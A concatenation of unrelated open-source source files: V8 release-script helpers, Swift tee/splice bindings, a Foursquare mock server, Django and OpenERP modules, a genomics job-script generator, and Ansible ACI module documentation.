bypass_hooks=self._options.bypass_upload_hooks,
cc=self._options.cc)
class DetermineV8Sheriff(Step):
MESSAGE = "Determine the V8 sheriff for code review."
def RunStep(self):
self["sheriff"] = None
if not self._options.sheriff: # pragma: no cover
return
# The sheriff determined by the rotation on the waterfall has a
# @google.com account.
url = "https://chromium-build.appspot.com/p/chromium/sheriff_v8.js"
match = re.match(r"document\.write\('(\w+)'\)", self.ReadURL(url))
# If "channel is sheriff", we can't match an account.
if match:
g_name = match.group(1)
# Optimistically assume that google and chromium account name are the
# same.
self["sheriff"] = g_name + "@chromium.org"
self._options.reviewer = ("%s,%s" %
(self["sheriff"], self._options.reviewer))
print "Found active sheriff: %s" % self["sheriff"]
else:
print "No active sheriff found."
def MakeStep(step_class=Step, number=0, state=None, config=None,
options=None, side_effect_handler=DEFAULT_SIDE_EFFECT_HANDLER):
# Allow to pass in empty dictionaries.
state = state if state is not None else {}
config = config if config is not None else {}
try:
message = step_class.MESSAGE
except AttributeError:
message = step_class.__name__
return step_class(message, number=number, config=config,
state=state, options=options,
handler=side_effect_handler)
class ScriptsBase(object):
def __init__(self,
config=None,
side_effect_handler=DEFAULT_SIDE_EFFECT_HANDLER,
state=None):
self._config = config or self._Config()
self._side_effect_handler = side_effect_handler
self._state = state if state is not None else {}
def _Description(self):
return None
def _PrepareOptions(self, parser):
pass
def _ProcessOptions(self, options):
return True
def _Steps(self): # pragma: no cover
raise Exception("Not implemented.")
def _Config(self):
return {}
def MakeOptions(self, args=None):
parser = argparse.ArgumentParser(description=self._Description())
parser.add_argument("-a", "--author", default="",
help="The author email used for rietveld.")
parser.add_argument("--dry-run", default=False, action="store_true",
help="Perform only read-only actions.")
parser.add_argument("-r", "--reviewer", default="",
help="The account name to be used for reviews.")
parser.add_argument("--sheriff", default=False, action="store_true",
help=("Determine current sheriff to review CLs. On "
"success, this will overwrite the reviewer "
"option."))
parser.add_argument("-s", "--step",
help="Specify the step where to start work. Default: 0.",
default=0, type=int)
parser.add_argument("--work-dir",
help=("Location where to bootstrap a working v8 "
"checkout."))
self._PrepareOptions(parser)
if args is None: # pragma: no cover
options = parser.parse_args()
else:
options = parser.parse_args(args)
# Process common options.
if options.step < 0: # pragma: no cover
print "Bad step number %d" % options.step
parser.print_help()
return None
# Defaults for options, common to all scripts.
options.manual = getattr(options, "manual", True)
options.force = getattr(options, "force", False)
options.bypass_upload_hooks = False
# Derived options.
options.requires_editor = not options.force
options.wait_for_lgtm = not options.force
options.force_readline_defaults = not options.manual
options.force_upload = not options.manual
# Process script specific options.
if not self._ProcessOptions(options):
parser.print_help()
return None
if not options.work_dir:
options.work_dir = "/tmp/v8-release-scripts-work-dir"
return options
def RunSteps(self, step_classes, args=None):
options = self.MakeOptions(args)
if not options:
return 1
state_file = "%s-state.json" % self._config["PERSISTFILE_BASENAME"]
if options.step == 0 and os.path.exists(state_file):
os.remove(state_file)
steps = []
for (number, step_class) in enumerate([BootstrapStep] + step_classes):
steps.append(MakeStep(step_class, number, self._state, self._config,
options, self._side_effect_handler))
for step in steps[options.step:]:
if step.Run():
return 0
return 0
def Run(self, args=None):
return self.RunSteps(self._Steps(), args)
| apache-2.0 |
daasbank/swift | swift/common/splice.py | 36 | 5500 | # Copyright (c) 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
Bindings to the `tee` and `splice` system calls
'''
import os
import operator
import six
import ctypes
import ctypes.util
__all__ = ['tee', 'splice']
c_loff_t = ctypes.c_long
# python 2.6 doesn't have c_ssize_t
c_ssize_t = getattr(ctypes, 'c_ssize_t', ctypes.c_long)
class Tee(object):
'''Binding to `tee`'''
__slots__ = '_c_tee',
def __init__(self):
libc = ctypes.CDLL(ctypes.util.find_library('c'), use_errno=True)
try:
c_tee = libc.tee
except AttributeError:
self._c_tee = None
return
c_tee.argtypes = [
ctypes.c_int,
ctypes.c_int,
ctypes.c_size_t,
ctypes.c_uint
]
c_tee.restype = c_ssize_t
def errcheck(result, func, arguments):
if result == -1:
errno = ctypes.set_errno(0)
raise IOError(errno, 'tee: %s' % os.strerror(errno))
else:
return result
c_tee.errcheck = errcheck
self._c_tee = c_tee
def __call__(self, fd_in, fd_out, len_, flags):
'''See `man 2 tee`
File-descriptors can be file-like objects with a `fileno` method, or
integers.
Flags can be an integer value, or a list of flags (exposed on
`splice`).
This function returns the number of bytes transferred (i.e. the actual
result of the call to `tee`).
Upon other errors, an `IOError` is raised with the proper `errno` set.
'''
if not self.available:
raise EnvironmentError('tee not available')
if not isinstance(flags, six.integer_types):
c_flags = six.moves.reduce(operator.or_, flags, 0)
else:
c_flags = flags
c_fd_in = getattr(fd_in, 'fileno', lambda: fd_in)()
c_fd_out = getattr(fd_out, 'fileno', lambda: fd_out)()
return self._c_tee(c_fd_in, c_fd_out, len_, c_flags)
@property
def available(self):
'''Availability of `tee`'''
return self._c_tee is not None
tee = Tee()
del Tee
class Splice(object):
'''Binding to `splice`'''
# From `bits/fcntl-linux.h`
SPLICE_F_MOVE = 1
SPLICE_F_NONBLOCK = 2
SPLICE_F_MORE = 4
SPLICE_F_GIFT = 8
__slots__ = '_c_splice',
def __init__(self):
libc = ctypes.CDLL(ctypes.util.find_library('c'), use_errno=True)
try:
c_splice = libc.splice
except AttributeError:
self._c_splice = None
return
c_loff_t_p = ctypes.POINTER(c_loff_t)
c_splice.argtypes = [
ctypes.c_int, c_loff_t_p,
ctypes.c_int, c_loff_t_p,
ctypes.c_size_t,
ctypes.c_uint
]
c_splice.restype = c_ssize_t
def errcheck(result, func, arguments):
if result == -1:
errno = ctypes.set_errno(0)
raise IOError(errno, 'splice: %s' % os.strerror(errno))
else:
off_in = arguments[1]
off_out = arguments[3]
return (
result,
off_in.contents.value if off_in is not None else None,
off_out.contents.value if off_out is not None else None)
c_splice.errcheck = errcheck
self._c_splice = c_splice
def __call__(self, fd_in, off_in, fd_out, off_out, len_, flags):
'''See `man 2 splice`
File-descriptors can be file-like objects with a `fileno` method, or
integers.
Flags can be an integer value, or a list of flags (exposed on this
object).
Returns a tuple of the result of the `splice` call, the output value of
`off_in` and the output value of `off_out` (or `None` for any of these
output values, if applicable).
Upon other errors, an `IOError` is raised with the proper `errno` set.
Note: if you want to pass `NULL` as value for `off_in` or `off_out` to
the system call, you must pass `None`, *not* 0!
'''
if not self.available:
raise EnvironmentError('splice not available')
if not isinstance(flags, six.integer_types):
c_flags = six.moves.reduce(operator.or_, flags, 0)
else:
c_flags = flags
c_fd_in = getattr(fd_in, 'fileno', lambda: fd_in)()
c_fd_out = getattr(fd_out, 'fileno', lambda: fd_out)()
c_off_in = \
ctypes.pointer(c_loff_t(off_in)) if off_in is not None else None
c_off_out = \
ctypes.pointer(c_loff_t(off_out)) if off_out is not None else None
return self._c_splice(
c_fd_in, c_off_in, c_fd_out, c_off_out, len_, c_flags)
@property
def available(self):
'''Availability of `splice`'''
return self._c_splice is not None
splice = Splice()
del Splice
| apache-2.0 |
omondiy/foursquared.eclair | mock_server/playfoursquare.py | 127 | 1999 | #!/usr/bin/python2.6
#
# Simple http server to emulate api.playfoursquare.com
import logging
import shutil
import urlparse
import SimpleHTTPServer
import BaseHTTPServer
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handle playfoursquare.com requests, for testing."""
def do_GET(self):
logging.warn('do_GET: %s, %s', self.command, self.path)
url = urlparse.urlparse(self.path)
logging.warn('do_GET: %s', url)
query = urlparse.parse_qs(url.query)
query_keys = [pair[0] for pair in query]
response = self.handle_url(url)
if response != None:
self.send_200()
shutil.copyfileobj(response, self.wfile)
self.wfile.close()
do_POST = do_GET
def handle_url(self, url):
path = None
if url.path == '/v1/venue':
path = '../captures/api/v1/venue.xml'
elif url.path == '/v1/venues':
path = '../captures/api/v1/venues.xml'
elif url.path == '/v1/user':
path = '../captures/api/v1/user.xml'
elif url.path == '/v1/checkcity':
path = '../captures/api/v1/checkcity.xml'
elif url.path == '/v1/checkins':
path = '../captures/api/v1/checkins.xml'
elif url.path == '/v1/cities':
path = '../captures/api/v1/cities.xml'
elif url.path == '/v1/switchcity':
path = '../captures/api/v1/switchcity.xml'
elif url.path == '/v1/tips':
path = '../captures/api/v1/tips.xml'
elif url.path == '/v1/checkin':
path = '../captures/api/v1/checkin.xml'
if path is None:
self.send_error(404)
else:
logging.warn('Using: %s' % path)
return open(path)
def send_200(self):
self.send_response(200)
self.send_header('Content-type', 'text/xml')
self.end_headers()
def main():
server_address = ('0.0.0.0', 8080)
httpd = BaseHTTPServer.HTTPServer(server_address, RequestHandler)
sa = httpd.socket.getsockname()
print "Serving HTTP on", sa[0], "port", sa[1], "..."
httpd.serve_forever()
if __name__ == '__main__':
main()
| apache-2.0 |
IV-GII/SocialCookies | ENV1/lib/python2.7/site-packages/django/contrib/sites/management.py | 232 | 1587 | """
Creates the default Site object.
"""
from django.db.models import signals
from django.db import connections
from django.db import router
from django.contrib.sites.models import Site
from django.contrib.sites import models as site_app
from django.core.management.color import no_style
def create_default_site(app, created_models, verbosity, db, **kwargs):
# Only create the default sites in databases where Django created the table
if Site in created_models and router.allow_syncdb(db, Site) :
# The default settings set SITE_ID = 1, and some tests in Django's test
# suite rely on this value. However, if database sequences are reused
# (e.g. in the test suite after flush/syncdb), it isn't guaranteed that
# the next id will be 1, so we coerce it. See #15573 and #16353. This
# can also crop up outside of tests - see #15346.
if verbosity >= 2:
print("Creating example.com Site object")
Site(pk=1, domain="example.com", name="example.com").save(using=db)
# We set an explicit pk instead of relying on auto-incrementation,
# so we need to reset the database sequence. See #17415.
sequence_sql = connections[db].ops.sequence_reset_sql(no_style(), [Site])
if sequence_sql:
if verbosity >= 2:
print("Resetting sequence")
cursor = connections[db].cursor()
for command in sequence_sql:
cursor.execute(command)
Site.objects.clear_cache()
signals.post_syncdb.connect(create_default_site, sender=site_app)
| gpl-2.0 |
jaggu303619/asylum | openerp/addons/hr_holidays/wizard/hr_holidays_summary_employees.py | 52 | 2187 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class hr_holidays_summary_employee(osv.osv_memory):
_name = 'hr.holidays.summary.employee'
_description = 'HR Leaves Summary Report By Employee'
_columns = {
'date_from': fields.date('From', required=True),
'emp': fields.many2many('hr.employee', 'summary_emp_rel', 'sum_id', 'emp_id', 'Employee(s)'),
'holiday_type': fields.selection([('Approved','Approved'),('Confirmed','Confirmed'),('both','Both Approved and Confirmed')], 'Select Leave Type', required=True)
}
_defaults = {
'date_from': lambda *a: time.strftime('%Y-%m-01'),
'holiday_type': 'Approved',
}
def print_report(self, cr, uid, ids, context=None):
data = self.read(cr, uid, ids, [], context=context)[0]
data['emp'] = context['active_ids']
datas = {
'ids': [],
'model': 'hr.employee',
'form': data
}
return {
'type': 'ir.actions.report.xml',
'report_name': 'holidays.summary',
'datas': datas,
}
hr_holidays_summary_employee()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
rsharris/jun2015lgl | create_script_insert_length_sparse.py | 1 | 17318 | #!/usr/bin/env python
"""
Create a cluster job file to create an average insert length sparsity
discriminator track.
"""
from sys import argv,stdin,stdout,stderr,exit
def usage(s=None):
message = """
usage: create_script_insert_length_sparse [options] > insert_length_sparse.sh
<sub>_<samp>_<type> (required) run descriptor; for example, CS_NORM_PE
means subject "CS", sample "NORM", and type "PE";
other filenames can use "{run}" to refer to this
string
--control=<filename> read control values from a file (see list below)
--base=<path> path prefix; other filenames can use "{base}" to
refer to this path
--chromosomes=<filename> read chromosome names and lengths from a file
(default is {base}/data/hg19.chrom_lengths)
--blacklist=<filename> (cumulative) track file of blacklist intervals
--input=<filename> (required) track file to process
--track=<filename> (required) track file to create
(default is {base}/tracks/{run}.insert_length.sparse)
--tempinput=<filename> temporary file to hold input track file, if
needed; only needed if the input track was gzipped
(default is {base}/tracks/{run}.insert_length.sparse.scratch)
--temp=<filename> temporary file to hold track file, if needed; only
needed if --gzip and --bigwig are both used
(default is {base}/tracks/{run}.insert_length.sparse.temp)
--gzip compress track file
--undated don't include today's date in the track name
--bigwig[=<filename>] create bigwig file in addition to track file
--bigwigchroms=<filename> chromosomes file for bedGraphToBigWig
(default is {base}/temp/ucsc.hg19.chrom_lengths)
--bigwigurl=<url> url for the bigwig file; this can use {bigwig}
for the bigwig filename
--bigwiglink=<filename> path at which to create a symbolic link to the
bigwig and info files; this can use {bigwig}
for the bigwig filename
--bigwigposition=<interval> intitial UCSC browser interval for bigwig track
--initialize=<text> (cumulative) shell command to add to job beginning
"shebang:bash" is mapped "#!/usr/bin/env bash"
other commands are copied "as is"
values read from control file:
avgInsertLen.{run}
insert_length_sparse.maskLevel
insert_length_sparse.windowLength
insert_length_sparse.minLength
insert_length_sparse.density
insert_length_sparse.densityClip
insert_length_sparse.samplingStep"""
if (s == None): exit (message)
else: exit ("%s%s" % (s,message))
def main():
global basePath,runName
global debug
bashShebang = "#!/usr/bin/env bash"
# parse args
runName = None
controlFilename = None
basePath = None
blacklistFilenames = []
inputFilename = None
chromsFilename = None
trackName = None
tempInputFilename = None
tempFilename = None
gzipOutput = False
dateInTrackname = True
bigWigFilename = None
bigWigChromsFilename = None
bigWigUrl = None
bigWigLink = None
bigWigPosition = None
bashInitializers = ["set -eu"]
debug = []
for arg in argv[1:]:
if ("=" in arg):
argVal = arg.split("=",1)[1].strip()
if (arg.startswith("--control=")):
controlFilename = argVal
elif (arg.startswith("--base=")) or (arg.startswith("--basepath=")) or (arg.startswith("--path=")):
basePath = argVal
elif (arg.startswith("--blacklist=")):
blacklistFilenames += [argVal]
elif (arg.startswith("--input=")):
inputFilename = argVal
elif (arg.startswith("--chromosomes=")) or (arg.startswith("--chroms=")):
chromsFilename = argVal
elif (arg.startswith("--track=")):
trackName = argVal
elif (arg.startswith("--tempinput=")):
tempInputFilename = argVal
elif (arg.startswith("--temp=")):
tempFilename = argVal
elif (arg == "--gzip"):
gzipOutput = True
elif (arg == "--undated"):
dateInTrackname = False
elif (arg == "--bigwig"):
bigWigFilename = "{track}.bw"
elif (arg.startswith("--bigwig=")):
bigWigFilename = argVal
elif (arg.startswith("--bigwigchromosomes=")) or (arg.startswith("--bigwigchroms=")):
bigWigChromsFilename = argVal
elif (arg.startswith("--bigwigurl=")) or (arg.startswith("--url=")):
bigWigUrl = argVal
elif (arg.startswith("--bigwiglink=")) or (arg.startswith("--link=")):
bigWigLink = argVal
elif (arg.startswith("--bigwigposition=")) or (arg.startswith("--bigwigpos=")):
bigWigPosition = argVal
elif (arg.startswith("--initialize=")) or (arg.startswith("--init=")):
if (argVal == "shebang:bash"):
argVal = bashShebang
if (argVal == "set -eu"):
bashInitializers = [x for x in bashInitializers if (x != "set -eu")]
bashInitializers += [argVal]
elif (arg == "--debug"):
debug += ["debug"]
elif (arg.startswith("--debug=")):
debug += argVal.split(",")
elif (arg.startswith("--")):
usage("unrecognized option: %s" % arg)
elif (runName == None):
fields = arg.split(":",2)
if (len(fields) != 3):
fields = arg.split("_")
if (len(fields) < 3) or (fields[-1] not in ["PE","MP"]):
usage("\"%s\" is not a valid run descriptor" % arg)
runName = "_".join(fields)
else:
usage("unrecognized option: %s" % arg)
if (runName == None):
usage("you have to give me a run descriptor")
if (controlFilename == None):
usage("you have to give me a control filename")
if (inputFilename == None):
usage("you have to give me an input track filename")
if (chromsFilename == None):
chromsFilename = "{base}/data/hg19.chrom_lengths"
if (trackName == None):
trackName = "{base}/tracks/{run}.insert_length.sparse"
if (tempInputFilename == None) and (inputFilename.endswith(".gz")):
tempInputFilename = trackName + ".scratch"
if (tempFilename == None) and (bigWigFilename != None) and (gzipOutput):
tempFilename = trackName + ".temp"
if (bigWigFilename != None):
if (bigWigChromsFilename == None):
bigWigChromsFilename = "{base}/temp/ucsc.hg19.chrom_lengths"
if (bigWigUrl == None):
usage("you have to give me a url for the bigwig file")
trackId = "%s.insert_length.sparse" % runName
##########
# perform filename substitution
##########
if (basePath == None): basePath = "."
elif (basePath.endswith("/")): basePath = basePath[:-1]
controlFilename = do_filename_substitutition(controlFilename)
chromsFilename = do_filename_substitutition(chromsFilename)
# blacklist track names
for (ix,blacklistFilename) in enumerate(blacklistFilenames):
blacklistFilename = do_filename_substitutition(blacklistFilename)
assert (not blacklistFilename.endswith(".gz"))
assert (not blacklistFilename.endswith(".gzip"))
if (not blacklistFilename.endswith(".dat")): blacklistFilename += ".dat"
blacklistFilenames[ix] = blacklistFilename
# input track name
inputFilename = do_filename_substitutition(inputFilename)
gzipInput = False
if (inputFilename.endswith(".gz")): gzipInput = True
elif (inputFilename.endswith(".gzip")): gzipInput = True
elif (not inputFilename.endswith(".dat")): inputFilename += ".dat"
# track name
trackName = do_filename_substitutition(trackName)
trackFilename = trackName
if (gzipOutput):
if (not trackFilename.endswith(".gz")): trackFilename += ".gz"
else:
if (not trackFilename.endswith(".dat")): trackFilename += ".dat"
if (tempInputFilename != None):
tempInputFilename = do_filename_substitutition(tempInputFilename)
if (tempFilename != None):
tempFilename = do_filename_substitutition(tempFilename)
# big wig name
if (bigWigFilename != None):
bigWigFilename = do_filename_substitutition(bigWigFilename)
if ("{track}" in bigWigFilename):
trackTemp = trackName
if (trackTemp.endswith(".gz")): trackTemp = trackTemp[:-3]
elif (trackTemp.endswith(".dat")): trackTemp = trackTemp[:-4]
bigWigFilename = bigWigFilename.replace("{track}",trackTemp)
if (bigWigFilename.endswith(".bw")): infoFilename = bigWigFilename[:-3] + ".info"
else: infoFilename = bigWigFilename + ".info"
if (bigWigChromsFilename != None):
bigWigChromsFilename = do_filename_substitutition(bigWigChromsFilename)
if (bigWigUrl != None):
bigWigTemp = bigWigFilename
slashIx = bigWigTemp.rfind("/")
if (slashIx >= 0): bigWigTemp = bigWigTemp[slashIx+1:]
bigWigUrl = bigWigUrl.replace("{bigwig}",bigWigTemp)
if (bigWigLink != None):
bigWigSave = bigWigLink
bigWigTemp = bigWigFilename
slashIx = bigWigTemp.rfind("/")
if (slashIx >= 0): bigWigTemp = bigWigTemp[slashIx+1:]
bigWigLink = bigWigLink.replace("{bigwig}",bigWigTemp)
infoTemp = infoFilename
slashIx = infoTemp.rfind("/")
if (slashIx >= 0): infoTemp = infoTemp[slashIx+1:]
infoLink = bigWigSave.replace("{bigwig}",infoTemp)
##########
# get values from the control file
##########
avgInsertLen = None
maskLevel = None
windowLength = None
minLength = None
densityThreshold = None
densityClip = None
samplingStep = None
f = file(controlFilename,"rt")
lineNumber = 0
for line in f:
lineNumber += 1
line = line.strip()
if (line == ""): continue
if (line.startswith("#")): continue
fields = line.split()
assert (len(fields) >= 3), \
"not enough fields at control file line %d (%d, expected at least 3)" \
% (lineNumber,len(fields))
assert (fields[1] == "="), \
"can't understand control file line %d:\n%s" \
% (lineNumber,line)
(name,_,val) = fields[:3]
if (name == "avgInsertLen." + runName): avgInsertLen = int(val)
if (name == "insert_length_sparse.maskLevel"): maskLevel = val
if (name == "insert_length_sparse.windowLength"): windowLength = int(val)
if (name == "insert_length_sparse.minLength"): minLength = int(val)
if (name == "insert_length_sparse.density"): densityThreshold = val
if (name == "insert_length_sparse.densityClip"): densityClip = val
if (name == "insert_length_sparse.samplingStep"): samplingStep = int(val)
f.close()
if (windowLength == None): windowLength = minLength
if (avgInsertLen == None): assert(False), "control file lacks avgInsertLen"
if (windowLength == None): assert(False), "control file lacks windowLength"
if (minLength == None): assert(False), "control file lacks minLength"
if (densityThreshold == None): assert(False), "control file lacks density"
if (densityClip == None): assert(False), "control file lacks density clip"
if (samplingStep == None): assert(False), "control filelacks samplingStep"
if (blacklistFilenames != []):
if (maskLevel == None): assert(False), "control file lacks maskLevel"
if ("." in maskLevel):
while (maskLevel.endswith("0")):
maskLevel = maskLevel[:-1]
if (maskLevel.endswith(".")):
maskLevel = maskLevel[:-1]
if ("." in densityThreshold):
while (densityThreshold.endswith("0")):
densityThreshold = densityThreshold[:-1]
if (densityThreshold.endswith(".")):
densityThreshold = densityThreshold[:-1]
if ("." in densityClip):
while (densityClip.endswith("0")):
densityClip = densityClip[:-1]
if (densityClip.endswith(".")):
densityClip = densityClip[:-1]
##########
# create the job's shell script
##########
# write bash intitializers
if (bashInitializers != None):
for (ix,bashInitializer) in enumerate(bashInitializers):
if (bashInitializer != bashShebang): continue
print bashInitializer
bashInitializers[ix] = None
for (ix,bashInitializer) in enumerate(bashInitializers):
if (bashInitializer != "set -eu"): continue
print bashInitializer
bashInitializers[ix] = None
for bashInitializer in bashInitializers:
if (bashInitializer == None): continue
print do_filename_substitutition(bashInitializer)
print
if (dateInTrackname):
print "today=`today {mmm}/{d}/{yyyy}`"
# write commands describing the files the script will create
if (tempInputFilename != None):
print "echo \"will use %s as a temporary input file\"" % tempInputFilename
if (tempFilename != None):
print "echo \"will write temporary files to %s\"" % tempFilename
print "echo \"will write track file to %s\"" % trackFilename
if (bigWigFilename != None):
print "echo \"will write bigwig file to %s\"" % bigWigFilename
# write command(s) to create track file
print
print "echo \"=== creating track %s ===\"" % trackId
if (gzipInput):
commands = []
command = ["time gzip -dc %s" % inputFilename]
commands += [command]
command = ["> %s" % tempInputFilename]
commands += [command]
print
print commands_to_pipeline(commands)
trackSourceFilename = tempInputFilename
else:
trackSourceFilename = inputFilename
commands = []
command = ["time genodsp"]
command += ["--chromosomes=%s" % chromsFilename]
command += ["--show:uncovered"]
command += ["= input %s --missing=-inf" % trackSourceFilename]
command += ["= addconst %s" % avgInsertLen]
command += ["= slidingsum W=%d D=W" % windowLength]
if (blacklistFilenames != []):
command += ["= percentile %s W=%d --min=1/inf --quiet" % (maskLevel,samplingStep)]
command += ["= input %s --missing=-inf" % trackSourceFilename]
command += ["= addconst %s" % avgInsertLen]
command += ["= slidingsum W=%d D=W" % windowLength]
command += ["= percentile %s,%s W=%d --min=1/inf --quiet" \
% (densityClip,densityThreshold,samplingStep)]
if (gzipInput): command += ["= input %s --missing=-inf --destroy" % trackSourceFilename]
else: command += ["= input %s --missing=-inf" % trackSourceFilename]
command += ["= addconst %s" % avgInsertLen]
command += ["= clip --min=percentile%s" % densityClip]
for blacklistFilename in blacklistFilenames:
command += ["= mask %s --mask=percentile%s" % (blacklistFilename,maskLevel)]
command += ["= anticlump --average=percentile%s L=%d" \
% (densityThreshold,minLength)]
for blacklistFilename in blacklistFilenames:
command += ["= mask %s --mask=0" % blacklistFilename]
commands += [command]
if (gzipOutput):
if (tempFilename != None):
command = ["tee %s" % tempFilename]
commands += [command]
command = ["gzip"]
commands += [command]
command = ["> %s" % trackFilename]
commands += [command]
print
print commands_to_pipeline(commands)
# write command(s) to convert track file to bigwig
if (bigWigFilename != None):
print
print "echo \"=== converting track %s to bigwig ===\"" % trackId
if (tempFilename != None): trackInput = tempFilename
else: trackInput = trackFilename
commands = []
command = ["time bedGraphToBigWig"]
command += [trackInput]
command += [bigWigChromsFilename]
command += [bigWigFilename]
commands += [command]
print
print commands_to_pipeline(commands)
if (tempFilename != None):
commands = []
command = ["rm %s" % tempFilename]
commands += [command]
print
print commands_to_pipeline(commands)
description = "sparse intervals in average insert lengths"
if (dateInTrackname): description += " (${today})"
commands = []
command = ["make_bigwig_info"]
command += ["--url=%s" % bigWigUrl]
command += ["--name=\"%s insert lengths sparse\"" % runName]
command += ["--desc=\"%s %s\"" % (runName,description)]
command += ["--autoscale=\"on\""]
command += ["--alwayszero=\"on\""]
command += ["--maxheight=\"10:10:10\""]
command += ["--color=250,30,100"]
if (bigWigPosition != None): command += ["--pos=\"%s\"" % bigWigPosition]
command += ["> %s" % infoFilename]
commands += [command]
print
print commands_to_pipeline(commands)
if (bigWigLink != None):
print
print "rm -f %s" % infoLink
print "ln -s %s %s" % (infoFilename,infoLink)
print "rm -f %s" % bigWigLink
print "ln -s %s %s" % (bigWigFilename,bigWigLink)
infoUrl = bigWigUrl
slashIx = infoUrl.rfind("/")
if (slashIx >= 0): infoUrl = infoUrl[:slashIx]
infoTemp = infoFilename
slashIx = infoTemp.rfind("/")
if (slashIx >= 0): infoTemp = infoTemp[slashIx+1:]
infoUrl = infoUrl + "/" + infoTemp
print >>stderr, infoUrl
print
print "echo \"track URL is %s\"" % (infoUrl)
def commands_to_pipeline(commands):
pipeline = []
for (cmdNum,cmd) in enumerate(commands):
if (cmdNum == 0): prefix = ""
else: prefix = " | "
if (cmd[0].startswith(">")):
assert (cmdNum != 0)
assert (len(cmd) == 1)
prefix = " "
pipeline += [prefix + cmd[0]]
for line in cmd[1:]:
pipeline += [" " + line]
return " \\\n".join(pipeline)
def do_filename_substitutition(s):
if ("{base}" in s):
assert (basePath != None)
s = s.replace("{base}",basePath)
if ("{run}" in s):
assert (runName != None)
s = s.replace("{run}",runName)
return s
if __name__ == "__main__": main()
| gpl-3.0 |
gaddman/ansible | lib/ansible/modules/network/aci/aci_contract_subject_to_filter.py | 2 | 9063 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: aci_contract_subject_to_filter
short_description: Bind Contract Subjects to Filters (vz:RsSubjFiltAtt)
description:
- Bind Contract Subjects to Filters on Cisco ACI fabrics.
notes:
- The C(tenant), C(contract), C(subject), and C(filter_name) must exist before using this module in your playbook.
The M(aci_tenant), M(aci_contract), M(aci_contract_subject), and M(aci_filter) modules can be used for these.
seealso:
- module: aci_tenant
- module: aci_contract
- module: aci_contract_subject
- module: aci_filter
- name: APIC Management Information Model reference
description: More information about the internal APIC class B(vz:RsSubjFiltAtt).
link: https://developer.cisco.com/docs/apic-mim-ref/
author:
- Jacob McGill (@jmcgill298)
version_added: '2.4'
options:
contract:
description:
- The name of the contract.
aliases: [ contract_name ]
filter:
description:
- The name of the Filter to bind to the Subject.
aliases: [ filter_name ]
log:
description:
- Determines if the binding should be set to log.
- The APIC defaults to C(none) when unset during creation.
choices: [ log, none ]
aliases: [ directive ]
subject:
description:
- The name of the Contract Subject.
aliases: [ contract_subject, subject_name ]
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
choices: [ absent, present, query ]
default: present
tenant:
description:
- The name of the tenant.
required: yes
aliases: [ tenant_name ]
extends_documentation_fragment: aci
'''
EXAMPLES = r'''
- name: Add a new contract subject to filer binding
aci_contract_subject_to_filter:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
contract: web_to_db
subject: test
filter: '{{ filter }}'
log: '{{ log }}'
state: present
delegate_to: localhost
- name: Remove an existing contract subject to filter binding
aci_contract_subject_to_filter:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
contract: web_to_db
subject: test
filter: '{{ filter }}'
log: '{{ log }}'
state: present
delegate_to: localhost
- name: Query a specific contract subject to filter binding
aci_contract_subject_to_filter:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
contract: web_to_db
subject: test
filter: '{{ filter }}'
state: query
delegate_to: localhost
register: query_result
- name: Query all contract subject to filter bindings
aci_contract_subject_to_filter:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
contract: web_to_db
subject: test
state: query
delegate_to: localhost
register: query_result
'''
RETURN = r'''
current:
description: The existing configuration from the APIC after the module has finished
returned: success
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
error:
description: The error information as returned from the APIC
returned: failure
type: dict
sample:
{
"code": "122",
"text": "unknown managed object class foo"
}
raw:
description: The raw output returned by the APIC REST API (xml or json)
returned: parse error
type: string
sample: '<?xml version="1.0" encoding="UTF-8"?><imdata totalCount="1"><error code="122" text="unknown managed object class foo"/></imdata>'
sent:
description: The actual/minimal configuration pushed to the APIC
returned: info
type: list
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment"
}
}
}
previous:
description: The original configuration from the APIC before the module has started
returned: info
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
proposed:
description: The assembled configuration from the user-provided parameters
returned: info
type: dict
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"name": "production"
}
}
}
filter_string:
description: The filter string used for the request
returned: failure or debug
type: string
sample: ?rsp-prop-include=config-only
method:
description: The HTTP method used for the request to the APIC
returned: failure or debug
type: string
sample: POST
response:
description: The HTTP response from the APIC
returned: failure or debug
type: string
sample: OK (30 bytes)
status:
description: The HTTP status from the APIC
returned: failure or debug
type: int
sample: 200
url:
description: The HTTP url used for the request to the APIC
returned: failure or debug
type: string
sample: https://10.11.12.13/api/mo/uni/tn-production.json
'''
